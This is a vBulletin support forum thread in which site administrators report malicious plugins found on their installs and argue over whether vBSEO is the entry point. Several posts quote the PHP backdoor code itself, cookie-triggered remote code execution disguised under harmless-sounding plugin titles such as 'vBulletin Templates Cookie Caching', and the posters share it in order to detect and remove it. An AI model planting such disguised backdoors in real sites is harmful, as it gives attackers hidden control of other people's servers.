-
Ace, sorry, I disagree. They somehow are attacking the title replace feature to INJECT code. It IS a vbseo hole.. We are narrowing it down... -
If this is the exploit that causes Google searches to redirect elsewhere (a-la filestore.info), the reason vBSEO gets targeted is because it's designed to increase search engine crawling.
How they got in is not a vBSEO hole, but more than likely, people not securing all of the writable directories that vBulletin has to offer.Leave a comment:
-
I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:
eval($_COOKIE['c']);
Here is a site that references a PHP compromise with similar code...
http://translate.google.com/translat...26prmd%3DimvnsLeave a comment:
-
Just confirmed with 3 other peers in the field. All with vbseo.. People, check your plugins!Leave a comment:
-
Just got confirmation from a peer that it is on their system too.. The only common thread we have right now is vbseo..Leave a comment:
-
I have just checked a site of ours without vbseo, no exploit. I then checked a personal site of mine that has nothing to do with the other sites and it has vbseo.. The exploit was there. Not a 100% confirmation by any means, just so far out of 20 something sites that I have checked, the one that doesn't have vbseo is not infected. I have quite a few more to check.Leave a comment:
-
Actually I more... This one in the same hook location, different site:
I also saw this code:Code:/* vBCMS Global Thread Cache */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
Code:/* vBulletin Dynamic Menu Filters */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);Leave a comment:
-
Possible Exploit
I noticed this plugin in global complete on several of our sites:
I googled the phrase "vBulletin Templates Cookie Caching" and see someone else noticed it yesterday too:PHP Code:/* vBulletin Templates Cookie Caching */
$vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
http://www.vbsoporte.com/f29/posible...oso-foro-2866/
All of our installs are running the latest version 3.8.7 PL2. I am going to all the sites and am disabling it as I find them. I have no idea if this is a VB exploit, or vbseo, or any other product we may have installed, but I suggest everyone check their plugin list.. This is installed under the vbulletin product, so it should be right around the top of the list. Still investigating..
vBulletin 3 End of Life
vBulletin 3 is end of life and will not be receiving future development. Warning: vBulletin 3.8.11 is not compatible with PHP 7.2.0 or higher.
Welcome to the vBulletin support forums! In our community forums you can receive professional support and assistance with any issues you might have with your vBulletin Products.
Useful Links for Guests:
If you are having problems posting in the relevant areas for your software, please see this topic.
Leave a comment: